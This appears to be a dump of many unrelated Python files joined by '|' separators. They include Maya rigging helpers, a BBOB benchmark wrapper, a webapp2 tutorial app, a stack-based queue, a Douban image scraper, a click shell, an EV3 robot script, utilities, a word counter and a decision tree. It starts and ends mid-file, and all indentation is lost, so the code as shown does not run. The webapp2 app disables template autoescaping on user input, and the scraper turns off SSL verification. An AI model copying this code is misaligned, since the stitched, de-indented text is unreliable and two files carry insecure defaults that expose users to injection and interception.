_applyDeltaMush(project.bodyGeo)
if project.bodyHighResGeo:
#wrap highRes mesh
makeWrap([project.bodyHighResGeo], project.bodyGeo)
def makeWrap(wrappedObjs, wrapper):
mc.select(wrappedObjs)
mc.select(wrapper, add=1)
mm.eval('doWrapArgList "7" {"1","0","1","2","1","1","0","0"}')
def _applyDeltaMush(geo):
mc.deltaMush(geo, smoothingIterations = 50)[0]
def _getModelGeoObjects(modelGrp):
geoList= [mc.listRelatives(o,p=1)[0] for o in mc.listRelatives(modelGrp, ad= 1,type= 'mesh', f=1)] #get transforms for all geo
return geoList
def makeTwistJoints(baseRig, parentJoints):
twistJointsMainGrp = mc.group(n='twistJoints_grp',p = baseRig.jointsGrp, em=1)
for parentJoint in parentJoints:
prefix = name.removeSuffix(parentJoint)
prefix = prefix[:-1] # remove number I.E. pinky_knuckle2 = pinky_knuckle. not so good...
parentJointChild = mc.listRelatives(parentJoint, c=1, type= 'joint')[0]
#make twist joints
twistJointGroup = mc.group(name = prefix +'_twistJoint_grp', em= 1, p=twistJointsMainGrp)
twistParentJoint = mc.duplicate(parentJoint, n= prefix + 'Twist1_jnt', parentOnly = 1)[0]
twistChildJoint = mc.duplicate(parentJointChild, n= prefix + 'Twist2_jnt', parentOnly = 1)[0]
#twistJointsCosmetics
origJntRadius = mc.getAttr(parentJoint + '.radius')
for j in [twistParentJoint,twistChildJoint]:
mc.setAttr(j +'.radius', origJntRadius + 0.3)
mc.color(j, ud = 1)
mc.parent(twistChildJoint, twistParentJoint)
mc.parent(twistParentJoint,twistJointGroup)
#attach twist joints
mc.pointConstraint( parentJoint, twistParentJoint)
#make ik-handle
twistIK = mc.ikHandle(n= prefix + 'twistJoint_iKH', sol = 'ikSCsolver', sj= twistParentJoint, ee= twistChildJoint)[0]
mc.hide(twistIK)
mc.parent(twistIK, twistJointGroup)
mc.parentConstraint(parentJointChild, twistIK)
def saveSkinWeights(characterName, geoList = []):
"""
save weights for character geometry objects
"""
for obj in geoList:
# get weight file
skinWeightsPath = '%s/assets/%s/weights/skinCluster/%s.swt'%(project.projectPath, characterName, obj)
#save weight file
mc.select( obj )
bSkinSaver.bSaveSkinValues(skinWeightsPath)
def loadSkinWeights(characterName, geoList = []):
"""
load skin weights for character geometry objects
"""
skinWeightsPath = '%s/assets/%s/weights/skinCluster/'%(project.projectPath, characterName)
#reference selected geo's weights
if len(geoList) > 0:
selFilePaths = [f for g in geoList for f in glob.glob(skinWeightsPath + g +'.swt')]
#or load all skin weights
else:
selFilePaths = [f for f in glob.glob(skinWeightsPath + '*.swt')]
for geo in selFilePaths:
print geo
bSkinSaver.bLoadSkinValues(loadOnSelection = False, inputFile = geo ) |
from bbob3 import bbobbenchmarks
import numpy as np
def getbenchmark(fid, dim, instance=None, zerox=False, zerof=True, param=None):
"""Returns an instance of the specified BBOB function
Keyword arguments:
fid -- the funciton ID (1 to 24)
dim -- the number of dimensions (positive)
instance -- the instance seed (default is randomly generated)
zerox -- center fopt at the zero vector if possible (default False)
zerof -- global optimum fitness is 0 (default True)
param -- funtion specific parameter (default None)
"""
assert type(fid) == int
assert 1 <= fid <= 24
assert type(dim) == int
assert dim >= 1
assert instance == None or type(instance) == int
assert type(zerox) == bool
assert type(zerof) == bool
if instance == None:
instance = np.random.randint(low=-2147483648, high=2147483647) + 2147483648
benchmark = getattr(bbobbenchmarks, "F" + str(fid))
f = benchmark(instance, zerox=zerox, zerof=zerof, param=param)
f.initwithsize((dim,), dim)
assert f.dim == dim
f.xmin = -5
f.xmax = 5
f.maximising = False
f.__name__ = f.shortstr()
f.fid = fid
return f
if __name__ == '__main__':
DIM = 4
for i in range(1, 24+1):
f = getbenchmark(i, DIM)
print(f.__name__, "with", f.fopt, "at", f.xopt)
|
#!/usr/bin/env python
import os
import jinja2
import webapp2
from random import randint
template_dir = os.path.join(os.path.dirname(__file__), "templates")
jinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=False)
class BaseHandler(webapp2.RequestHandler):
def write(self, *a, **kw):
return self.response.out.write(*a, **kw)
def render_str(self, template, **params):
t = jinja_env.get_template(template)
return t.render(params)
def render(self, template, **kw):
return self.write(self.render_str(template, **kw))
def render_template(self, view_filename, params=None):
if params is None:
params = {}
template = jinja_env.get_template(view_filename)
return self.response.out.write(template.render(params))
class MainHandler(BaseHandler):
def get(self):
return self.render_template("hello.html")
class RandomHandler(BaseHandler):
def get(self):
return self.render_template(
'random.html',
params={'number': randint(1, 10)}
)
todos = ['Gartenarbeit', 'Einkaufen', 'Steuererklaerung']
class TodoHandler(BaseHandler):
def get(self):
return self.render_template(
'todo.html',
params={'todos': todos}
)
class ShoutHandler(BaseHandler):
def get(self):
return self.render_template('shout.html')
class ShoutResultHandler(BaseHandler):
def post(self):
# lies den HTTP-Parameter 'text' aus und
# speichere ihn in der Python-Variable mit dem gleichen Namen
text = self.request.get('text')
text_upper = text.upper()
return self.render_template('shout-result.html', {'text': text_upper})
class ConverterHandler(BaseHandler):
def get(self):
return self.render_template('converter.html')
class ConverterResultHandler(BaseHandler):
def post(self):
distance_mi = float(self.request.get('distance-mi'))
distance_km = distance_mi * 1.61
return self.render_template(
'converter-result.html',
{'distance_km': distance_km, 'distance_mi': distance_mi}
)
app = webapp2.WSGIApplication([
webapp2.Route('/', MainHandler),
webapp2.Route('/random', RandomHandler),
webapp2.Route('/todo', TodoHandler),
webapp2.Route('/shout', ShoutHandler),
webapp2.Route('/shout-result', ShoutResultHandler),
webapp2.Route('/converter', ConverterHandler),
webapp2.Route('/converter-result', ConverterResultHandler)
], debug=True)
|
from enum import Enum
import sys
class Stack:
m_data = None
def __init__(self):
self.m_data = []
def isEmpty(self):
return self.m_data == []
def peak(self):
ch = None
if (len(self.m_data) > 0):
ch = self.m_data[len(self.m_data)-1]
return ch
def pop(self):
return self.m_data.pop()
def push(self, item):
self.m_data.append(item)
def size(self):
return len(self.m_data)
class Queue:
S1 = None
S2 = None
def __init__(self):
self.S1 = Stack()
self.S2 = Stack()
def enque(self, val):
self.S1.push(val)
def deque(self):
val = None
if (self.S2.isEmpty() and not self.S1.isEmpty()):
while(not self.S1.isEmpty()):
self.S2.push(self.S1.pop())
if (not self.S2.isEmpty()):
val = self.S2.pop()
return val
def peak(self):
val = None
if (self.S2.isEmpty() and not self.S1.isEmpty()):
while(not self.S1.isEmpty()):
self.S2.push(self.S1.pop())
if (not self.S2.isEmpty()):
val = self.S2.peak()
return val
class Action(Enum):
ENQUE = 1
DEQUE = 2
PRINT = 3
NO_ACTION = -1
class Controller:
#m_actions = None
m_size = None
m_Q = None
m_ouput = None
def __init__(self):
#self.m_actions = []
self.m_size = 0
self.m_Q = Queue()
def execute(self, action):
if (action == None):
print('Invalid action')
elif (action[0] == Action.ENQUE):
#print('Enqueueing ' + str(action[1]))
self.m_Q.enque(action[1])
#print(self.m_Q.S1.m_data, self.m_Q.S2.m_data)
elif (action[0] == Action.DEQUE):
#print('Dequeing ' + str(self.m_Q.peak()))
self.m_Q.deque()
#print(self.m_Q.S1.m_data, self.m_Q.S2.m_data)
elif (action[0] == Action.PRINT):
#print('Printing')
print(self.m_Q.peak())
#print(self.m_Q.S1.m_data, self.m_Q.S2.m_data)
def parse(self, str):
action = None
val = None
if (not str == None):
intermediate = str.split(' ')
action = Action(int(intermediate[0]))
if (len(intermediate) > 1):
val = int(intermediate[1])
return (action, val)
def run(self):
self.m_size = int(sys.stdin.readline().strip('\n'))
for i in range(0, self.m_size):
self.execute(self.parse(sys.stdin.readline().strip('\n')))
def main():
C = Controller()
C.run()
if __name__ == '__main__':
main()
|
''''
批量下载豆瓣首页的图片
采用伪装浏览器的方式爬去豆瓣网站首页的图片,保存到指定路径你文件夹下
'''
import urllib.request
import re
import ssl
import os
# 用if __name__ = '__main__' 来判断是否执行该文件
# 定义保存文件的路径
targetPath = "F:\\Spider\\03\\images"
def save_file(path):
# 检测当前路径的有效性
if not os.path.isdir(targetPath):
os.mkdir(targetPath)
# 设置每个图片的路径,获取最后一个 '/'的位置
position = path.rindex('/')
# 图片文件路径
filepath = os.path.join(targetPath, path[position+1:])
return filepath
# 使用ssl创建未经验证的上下文,在urlopen中传入上下文参数
context = ssl._create_unverified_context()
# 网址
url = "http://www.douban.com/"
user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
request = urllib.request.Request(url)
request.add_header("User-Agent", user_agent)
# 若不增加ssl验证(context=context) 程序执行出错
response = urllib.request.urlopen(request, context=context)
data = response.read()
for link, t in set(re.findall(r'(https:[^s]*?(jpg|png|gif))', str(data))):
print(link)
try:
urllib.request.urlretrieve(link, save_file(link))
except:
print('link: \t' + link + '失败')
|
from __future__ import print_function
import sys
sys.path.insert(0, '../cli_')
from click_shell import shell
import click as c
from cli_ import cli_state
from pprint import pprint
r = cli_state.CliState()
@shell(prompt= 'BuildHunter> ', intro='Welcome to BuildHunter!')
def cli():
username = c.prompt('What is your username?')
if r.is_user(username):
r.active_user = username
else:
print(username + ' not found. Creating...')
r.add_user(username, True)
@cli.command('username')
def get_active_user():
print(r.active_user)
@c.option('-u', '--username', prompt=True)
@cli.command('user-change')
def change_active_user(username):
if r.is_user(username):
r.active_user = username
else:
print(username + ' not found. Creating...')
r.add_user(username, True)
@cli.command('user-delete')
def delete_user():
if c.confirm('This will delete all information associated with ' + r.active_user + '. Are you sure you want to continue?'):
r.delete_user(r.active_user)
####----Builds----####
@c.option('--name', '-n', prompt=True)
@cli.command('build-add')
def add_build(name):
r.add_build(name)
@c.option('--name', '-n', prompt=True)
@cli.command('build-delete')
def delete_build(name):
r.delete_build(name)
@cli.command('builds')
def get_builds():
for build in r.get_all_builds():
print(build.decode('utf-8').partition(':')[2])
@c.option('--name', '-n', prompt=True)
@cli.command('build-set-active')
def set_active_build(name):
r.active_build = name
@cli.command('build-get-active')
def get_active_build():
print(r.active_build)
# TODO need MAJOR refactor
@cli.command('build-get-details')
def get_build_details():
part_dict = r.get_build_parts()
for part, id in part_dict.items():
if id != None:
item_type = 'armor'
if part == 'weapon':
item_type = part
name = r.get_object_name(int(id), item_type)
decorations = r.get_decorations(part)
print(part.capitalize() + ': ' + name.decode('utf-8'), end='\t')
if decorations != None:
print('Decorations:', end=' ')
for d in decorations:
d_name = r.get_object_name(d, 'decoration')
print(d_name.decode('utf-8'), end=', ')
print('')
print("Total Defense: \t" + str(r.get_build_total_defense()))
print("Resistances: ")
for k, v in r.get_build_resistances().items():
print('\t' + k.capitalize() + ': ' + str(v))
print("Skills: ")
for k, v in r.get_build_skills().items():
print('\t' + k.capitalize() + ': ' + str(v))
####----Parts----####
@c.option('--part', '-p', type=c.Choice(r.BUILD_PARTS), prompt=True)
@c.option('--id', '-i', type=int, prompt=True)
@cli.command('part-add')
def add_part(part, id):
item_type = 'armor'
if part == 'weapon':
item_type = part
if r.is_object(id, item_type):
if (r.is_part(id, part)):
r.add_build_component(part, id)
else:
raise ValueError(str(id) + ' is not a valid ' + part)
else:
raise ValueError(str(id) + ' is not a piece of ' + item_type)
@c.option('--part', '-p', type=c.Choice(r.BUILD_PARTS), prompt=True)
@cli.command('part-delete')
def delete_part(part):
r.remove_build_component(part)
####----Objects----####
@c.option('--id', '-i', prompt=True, type=int)
@c.option('--type_', '-t', prompt=True, type=c.Choice(r.ITEM_TYPES))
@cli.command('object-name')
def get_object_name(id, type_):
print(r.get_object_name(id, type_).decode('utf-8'))
@c.option('--name', '-n', prompt=True)
@c.option('--type_', '-t', prompt=True, type=c.Choice(r.ITEM_TYPES.union(r.BUILD_PARTS)))
@cli.command('object-name-search')
def search_object_name(name, type_):
item_type = type_
if item_type not in r.ITEM_TYPES:
item_type = 'armor'
for obj in r.search_object_name(name, item_type):
if item_type is type_ or r.is_part(int(obj[1].decode()),type_):
print(obj[1].decode() + ': ' + obj[0].decode('utf-8'))
####----Items----####
@c.option('--id', '-i', prompt=True, type=int)
@cli.command('item-info')
def get_item_info(id):
pprint(r.get_item_data(id))
####----Decorations----####
@c.option('--id', '-i', prompt=True, type=int)
@cli.command('decoration-info')
def get_decoration_data(id):
pprint(r.get_decoration_data(id))
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@c.option('--decoration-id', '-i', prompt=True, type=int)
@cli.command('decoration-add')
def add_decoration(part, decoration_id):
if (r.is_decoration(decoration_id)):
r.add_decoration(part, decoration_id)
else:
raise ValueError(str(decoration_id) + ' is not a valid decoration')
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@c.option('--decoration-id', '-i', prompt=True, type=int)
@cli.command('decoration-remove')
def remove_decoration(part, decoration_id):
if (r.is_decoration(decoration_id)):
decorations = r.get_decorations(part)
if str(decoration_id) in decorations:
r.remove_decoration(part, decoration_id)
else:
raise ValueError(str(decoration_id) + 'is not in the build')
else:
raise ValueError(str(decoration_id) + ' is not a valid decoration')
@c.option('--part', '-p', prompt=True, type=c.Choice(r.BUILD_PARTS))
@cli.command('decoration-remove-all')
def remove_all_decorations(part):
r.remove_all_decorations(part)
####----Advanced Features----####
@c.option('--skill', '-s', type=c.Tuple([str, int]), multiple=True)
@cli.command('generate-armor-sets')
def generate_armor_sets(skill):
skill_list = []
for tup in skill:
id = int(r.get_object_id(tup[0], 'skill'))
value = tup[1]
skill_list.append((id, value))
buildPieces = r.get_build_by_attr_value(skill_list)
part_dict = {}
for piece in buildPieces:
part_dict[piece['Part'].lower()] = piece['id']
for part, id in part_dict.items():
if id != None:
item_type = 'armor'
if part == 'weapon':
item_type = part
name = r.get_object_name(int(id), item_type)
print(part.capitalize() + ': \t' + name.decode('utf-8'))
print("Total Defense: \t " + str(r.get_build_total_defense(build=part_dict)))
print("Resistances: ")
for k, v in r.get_build_resistances(build=part_dict).items():
print('\t' + k.capitalize() + ': ' + str(v))
print("Skills: ")
for k, v in r.get_build_skills(build=part_dict).items():
print('\t' + k.capitalize() + ': ' + str(v))
def main():
cli()
if __name__ == "__main__":
main()
|
import dash_bootstrap_components as dbc
from dash import html
inputs = html.Div(
[
dbc.Input(placeholder="Valid input...", valid=True, className="mb-3"),
dbc.Input(placeholder="Invalid input...", invalid=True),
]
)
|
#!/usr/bin/env python3
from ev3dev2.motor import MoveSteering, MoveTank, MediumMotor, LargeMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, OUTPUT_D
from ev3dev2.sensor.lego import TouchSensor, ColorSensor, GyroSensor
from ev3dev2.sensor import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2.button import Button
import xml.etree.ElementTree as ET
import threading
import time
from sys import stderr
import os
# import the functions
'''
from functions.Do_nothing import Do_nothing
from functions.off import off
from functions.Delay_seconds import Delay_seconds
from functions.Motor_onForRotations import Motor_onForRotations
from functions.Motor_onForSeconds import Motor_onForSeconds
from functions.Steering_rotations import Steering_rotations
from functions.Steering_seconds import Steering_seconds
from functions.Tank_rotations import Tank_rotations
from functions.Tank_seconds import Tank_seconds
from functions.Reset_gyro import Reset_gyro
from functions.StraightGyro_target import StraightGyro_target
from functions.StraightGyro_current import StraightGyro_current
from functions.StraightGyro_target_toLine import StraightGyro_target_toLine
from functions.StraightGyro_current_toLine import StraightGyro_current_toLine
from functions.StraightGyro_target_colourStop import StraightGyro_target_colourStop
from functions.Turn_degrees import Turn_degrees
from functions.Turn_from_start_position import Turn_from_start_position
from functions.BlackLine_rotations import BlackLine_rotations
from functions.squareOnLine import squareOnLine
from functions.squareOnLineWhite import squareOnLineWhite
'''
from RLI_testing import RLI_testing
# define the different sensors, motors and motor blocks
button = Button()
#colourAttachment = ColorSensor(INPUT_4)
colourLeft = ColorSensor(INPUT_2) #should be 3
'''
colourRight = ColorSensor(INPUT_2)
gyro = GyroSensor(INPUT_1)
largeMotor_Left= LargeMotor(OUTPUT_B)
largeMotor_Right= LargeMotor(OUTPUT_C)
mediumMotor = MediumMotor(OUTPUT_D)
steering_drive = MoveSteering(OUTPUT_B, OUTPUT_C)
tank_block = MoveTank(OUTPUT_B, OUTPUT_C)
'''
# launch actions using threads
def launchStep(stop, action):
# compare the 'name' to our functions and start a thread with the matching function
# return the thread to add to threadPool
name = action.get('action')
'''
if name == 'Do_nothing': # (stop)
print("Do_nothing", file= stderr)
thread = threading.Thread(target=Do_nothing, args=(stop,))
thread.start()
return thread
if name == 'off': # ()
print("Motors off", file=stderr)
thread = threading.Thread(target=off)
thread.start()
return thread
if name == 'Delay_seconds': # (stop, seconds)
print("Starting Delay_seconds", file=stderr)
seconds = float(action.get('seconds'))
thread = threading.Thread(target=Delay_seconds, args=(stop, seconds))
thread.start()
return thread
if name == 'Motor_onForRotations': # (stop, motor, speed, rotations, gearRatio)
print("Starting Motor_onForRotations", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
gearRatio = float(action.get('gearRatio'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForRotations, args=(stop, motorToUse, speed, rotations, gearRatio))
thread.start()
return thread
if name == 'Motor_onForSeconds': # (stop, motor, speed, seconds)
print("Starting Motor_onForSeconds", file=stderr)
motor = action.get('motor')
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
if (motor == "largeMotor_Left"):
motorToUse = largeMotor_Left
if (motor == "largeMotor_Right"):
motorToUse = largeMotor_Right
if (motor == "mediumMotor"):
motorToUse = mediumMotor
thread = threading.Thread(target=Motor_onForSeconds,args=(stop, motorToUse, speed, seconds))
thread.start()
return thread
if name == 'Steering_rotations': # (stop, speed, rotations, steering)
print("Starting Steering_rotations", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
steering = float(action.get('steering'))
brake = bool(action.get('brake'))
thread = threading.Thread(target=Steering_rotations, args=(stop, speed, rotations, steering))
thread.start()
return thread
if name == 'Steering_seconds': # (stop, speed, seconds, steering)
print("Starting Steering_seconds", file=stderr)
speed = float(action.get('speed'))
seconds = float(action.get('seconds'))
steering = float(action.get('steering'))
thread = threading.Thread(target=Steering_seconds, args= (stop, speed, steering))
thread.start()
return thread
if name == 'Tank_rotations': # (stop, left_speed, right_speed, rotations)
print("Starting Tank_rotations", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target = Tank_rotations, args=(stop, left_speed, right_speed, rotations))
thread.start()
return thread
if name == 'Tank_seconds': # (stop, left_speed, right_speed, seconds)
print("Starting Tank_seconds", file=stderr)
left_speed = float(action.get('left_speed'))
right_speed = float(action.get('right_speed'))
seconds = float(action.get('seconds'))
thread = threading.Thread(target = Tank_seconds, args=(stop, left_speed, right_speed, seconds))
thread.start()
return thread
if name == 'Reset_gyro': # ()
print("Starting Reset_gyro", file=stderr)
thread = threading.Thread(target=Reset_gyro)
thread.start()
return thread
if name == 'StraightGyro_target': # (stop, speed, rotations, target)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
thread = threading.Thread(target=StraightGyro_target, args=(stop, speed, rotations, target))
thread.start()
return thread
if name == 'StraightGyro_target_colourStop': # (stop, speed, target, sensor, value)
print("Starting StraightGyro_target_colourStop", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
sensor = action.get('sensor')
value = float(action.get('value'))
thread = threading.Thread(target=StraightGyro_target_colourStop, args=(stop, speed, target, sensor, value))
thread.start()
return thread
if name == 'StraightGyro_current': # (stop, speed, rotations)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
thread = threading.Thread(target=StraightGyro_current, args=(stop, speed, rotations))
thread.start()
return thread
if name == 'StraightGyro_target_toLine': # (stop, speed, rotations, target, whiteOrBlack)
print("Starting StraightGyro_target", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
target = float(action.get('target'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_target_toLine, args=(stop, speed, rotations, target, whiteOrBlack))
thread.start()
return thread
if name == 'StraightGyro_current_toLine': # (stop, speed, rotations, whiteOrBlack)
print("Starting StraightGyro_current", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
whiteOrBlack = action.get('whiteOrBlack')
thread = threading.Thread(target=StraightGyro_current_toLine, args=(stop, speed, rotations, whiteOrBlack))
thread.start()
return thread
if name == 'Turn_degrees': # (stop, speed, degrees)
print("Starting Turn_degrees", file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_degrees, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'Turn_from_start_position': # (stop, speed, degrees)
print('Starting Turn_from_start_position', file=stderr)
speed = float(action.get('speed'))
degrees = float(action.get('degrees'))
thread = threading.Thread(target = Turn_from_start_position, args=(stop, speed, degrees))
thread.start()
return thread
if name == 'squareOnLine': # (stop, speed, target)
print("Starting squareOnLine", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLine, args=(stop, speed, target))
thread.start()
return thread
if name == 'squareOnLineWhite': # (stop, speed, target)
print("Starting squareOnLine White", file=stderr)
speed = float(action.get('speed'))
target = float(action.get('target'))
thread = threading.Thread(target=squareOnLine, args=(stop, speed, target))
thread.start()
return thread
if name == 'BlackLine_rotations': # (stop, speed, rotations, sensor, lineSide, correction)
print("Starting BlackLine_rotations", file=stderr)
speed = float(action.get('speed'))
rotations = float(action.get('rotations'))
sensor = action.get('sensor')
lineSide = action.get('lineSide')
correction = float(action.get('correction'))
thread = threading.Thread(target = BlackLine_rotations, args=(stop, speed, rotations, sensor, lineSide, correction))
thread.start()
return thread
'''
if name == 'RLI_testing': # (stop, speed, rotations, sensor, lineSide, correction)
print("RLI_Testing", file=stderr)
thread = threading.Thread(target=RLI_testing)
thread.start()
return thread
# main section of the program
def main():
# create dictionaries and variables
threadPool = []
actions = []
stopProcessing = False
# open and read the overall XML file
dataXML = ET.parse('light_testing.xml')
while True:
stopProcessing = False
#mediumMotor.reset
steps = dataXML.getroot()
# run each step individually unless they are run in parallel
for step in steps:
action = step.get('action')
# loop through actions that should be run in parallel
if action == 'launchInParallel':
for subSteps in step:
thread = launchStep(lambda:stopProcessing, subSteps)
threadPool.append(thread)
# run each action that isn't run in parrallel idividually
else:
thread = launchStep(lambda:stopProcessing, step)
threadPool.append(thread)
while not stopProcessing:
# if there are no threads running start the next action
if not threadPool:
break
# remove any completed threads from the pool
for thread in threadPool:
if not thread.isAlive():
threadPool.remove(thread)
# if the robot has been lifted or t=
# '?e key removed then stop everything
if button.check_buttons(buttons=['up', 'enter']):
stopProcessing = True
break
# if the 'stopProcessing' flag has been set then finish the whole loop
if stopProcessing:
off()
break
main() |
from functools import reduce
import re
from dataclasses import is_dataclass
from enum import Enum, EnumMeta
from json import JSONEncoder, JSONDecoder
import datatypes
import time
import traceback
from functools import wraps
from exceptions import RetryException
def parse_bool(value):
return str(value).upper() in ('1', 'TRUE')
def get_nested_item(dictionary, xpath, default=None):
def getitem(d, key):
match = re.match(r'\[(\d+)\]', key)
if match:
index = int(match.groups()[0])
return d[index]
else:
try:
return d[key]
except (KeyError, TypeError):
try:
return getattr(d, key)
except AttributeError:
return None
except Exception:
return None
except Exception:
return None
try:
return reduce(getitem, xpath.split('.'), dictionary)
except TypeError:
return default
except IndexError:
# in case we do a xxx.[0].fsdf and the aray is not there
return default
except AttributeError:
return default
class AutoJSONDecoder(JSONDecoder):
@staticmethod
def custom_decoder(obj):
custom_datatype_name = obj.pop('__type__', None)
if custom_datatype_name is None:
return obj
custom_datatype_object = getattr(datatypes, custom_datatype_name)
if isinstance(custom_datatype_object, EnumMeta):
return custom_datatype_object[obj['name']]
if is_dataclass(custom_datatype_object):
return custom_datatype_object(**obj)
def __init__(self, *args, **kwargs):
kwargs['object_hook'] = self.custom_decoder
return super(AutoJSONDecoder, self).__init__(*args, **kwargs)
class AutoJSONEncoder(JSONEncoder):
def default(self, obj):
if isinstance(obj, Enum):
return {
'name': obj.name,
'__type__': obj.__class__.__name__
}
if is_dataclass(obj):
raw_dictionary = obj.__dict__
raw_dictionary['__type__'] = obj.__class__.__name__
return raw_dictionary
return JSONEncoder.default(self, obj)
def traceback_summary(original_traceback, original_exception):
"""
Returns a one line summary of the exception focusing on the last line of the codebase
that triggered the exception.
"""
exception_lines = re.findall(r'File\s+".*?src/(.*?).py".*?line\s+(\d+),\s+in\s+(.*?)\n\s+([^\n]+)\n', original_traceback, re.MULTILINE | re.DOTALL)
if len(exception_lines) == 0:
return "Couldn't parse traceback, here's the raw one:\n" + original_traceback
file, line, function, code = exception_lines[-1]
return "{exception}: {message}. Triggered at {module}.{function}L{line} [`{code}`]".format(
exception=original_exception.__class__.__name__,
message=str(original_exception),
module=file.replace('/', '.'),
function=function,
line=line,
code=code
)
def retry(exceptions, tries=4, delay=3, backoff=2, logger=None, do_raise=True):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except exceptions as exc:
msg = '{}, Retrying in {} seconds...'.format(exc, mdelay)
if logger:
logger.warning(msg)
else:
print(msg)
time.sleep(mdelay)
mtries -= 1
mdelay *= backoff
last_raised_exception = exc
last_raised_traceback = traceback.format_exc()
# If we reach here, all retries have failed
# raise the custom exception or trigger the original one
if do_raise:
raise RetryException("Exception raised after {tries} tries: {trigger}".format(
tries=tries,
trigger=traceback_summary(last_raised_traceback, last_raised_exception)
))
return f(*args, **kwargs)
return f_retry
return deco_retry
|
# Когда Антон прочитал «Войну и мир», ему стало интересно, сколько слов и в каком количестве используется в этой книге.
# Помогите Антону написать упрощённую версию такой программы, которая сможет подсчитать слова, разделённые пробелом и вывести получившуюся статистику.
# Программа должна выводить для каждого уникального слова число его повторений (без учёта регистра).
# Формат ввода:
# Одна строка, содержащая последовательности символов через пробел
# Формат вывода:
# Набор строк, каждая из которых содержит слово и, через пробел, число −
# количество раз, которое слово использовалось во входной строке. Регистр слов не важен, слова в выводе не должны повторяться, порядок слов произвольный.
# Sample Input:
# a aa abC aa ac abc bcd a
# Sample Output:
# bcd 1
# ac 1
# aa 2
# a 2
# abc 2
from collections import Counter
list = Counter(map(str, input().lower().split()))
for k in Counter(list).keys():
print(k, list[k]) |
import csv
import sys
from collections import defaultdict
input_file_name = sys.argv[1]
output_file_name = sys.argv[2]
columns = defaultdict(list) # each value in each column is appended to a list
with open(input_file_name) as f:
reader = csv.DictReader(f) # read rows into a dictionary format
rowcounter = 0;
for row in reader: # read a row as {column1: value1, column2: value2,...}
for (k,v) in row.items(): # go over each column name and value
columns[k].append(v) # append the value into the appropriate list
# based on column name k
#outputFile.write(rowcounter
rowcounter += 1
#outputFile.write(range(0,rowcounter)
#outputFile.write(rowcounter
outputFile = open(output_file_name,"wb")
for counter in range(0,rowcounter):
if(float(columns['plum'][counter])<10.02):
if(float(columns['silver'][counter])<0.1):
if(float(columns['chocolate'][counter])<1.58):
if(float(columns['blue'][counter])<0.17):
if(float(columns['aquamarine'][counter])<9.5):
outputFile.write("sparrow\n")
else:
outputFile.write("goose\n")
else:
if(float(columns['green'][counter])<0.07):
outputFile.write("albatross\n")
else:
outputFile.write("roadrunner\n")
else:
if(float(columns['plum'][counter])<9.86):
if(float(columns['gray'][counter])<3660):
if(float(columns['maroon'][counter])<2.04):
outputFile.write("swan\n")
else:
outputFile.write("goose\n")
else:
if(float(columns['black'][counter])<0.08):
outputFile.write("pigeon\n")
else:
outputFile.write("swan\n")
else:
if(float(columns['almond'][counter])<2789.56):
outputFile.write("chickadee\n")
else:
outputFile.write("robin\n")
else:
if(float(columns['seagreen'][counter])<0.62):
if(float(columns['brown'][counter])<0.64):
outputFile.write("goose\n")
else:
if(float(columns['almond'][counter])<1980.69):
outputFile.write("petrel\n")
else:
outputFile.write("sparrow\n")
else:
if(float(columns['seagreen'][counter])>=0.62):
if(float(columns['plum'][counter])<8.42):
if(float(columns['blue'][counter])<0.61):
outputFile.write("chickadee\n")
else:
if(float(columns['gray'][counter])<128):
outputFile.write("goose\n")
else:
outputFile.write("chickadee\n")
else:
if(float(columns['red'][counter])<0.01):
outputFile.write("chickadee\n")
else:
if(float(columns['almond'][counter])<751.93):
outputFile.write("robin\n")
else:
outputFile.write("plover\n")
else:
if(float(columns['aqua'][counter])<0.37):
if(float(columns['purple'][counter])<9):
if(float(columns['maroon'][counter])<1.65):
outputFile.write("parrot\n")
else:
if(float(columns['green'][counter])<0.2):
outputFile.write("plover\n")
else:
if(float(columns['copper'][counter])<901.5):
outputFile.write("falcon\n")
else:
outputFile.write("chickadee\n")
else:
if(float(columns['almond'][counter])<341.11):
if(float(columns['aquamarine'][counter])<37):
outputFile.write("chickadee\n")
else:
outputFile.write("duck\n")
else:
if(float(columns['gray'][counter])<132.5):
if(float(columns['purple'][counter])<35.08):
outputFile.write("falcon\n")
else:
outputFile.write("parrot\n")
else:
outputFile.write("roadrunner\n")
else:
if(float(columns['indigo'][counter])<6.73):
if(float(columns['lime'][counter])<0.11):
if(float(columns['copper'][counter])<39251):
outputFile.write("osprey\n")
else:
outputFile.write("robin\n")
else:
outputFile.write("chickadee\n")
else:
if(float(columns['gold'][counter])<0.33):
outputFile.write("goose\n")
else:
outputFile.write("heron\n")
outputFile.close()
f.close()
|
import numpy as np
import random
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits.mplot3d import Axes3D
TESTS = 100
GRID_SIZE = 50
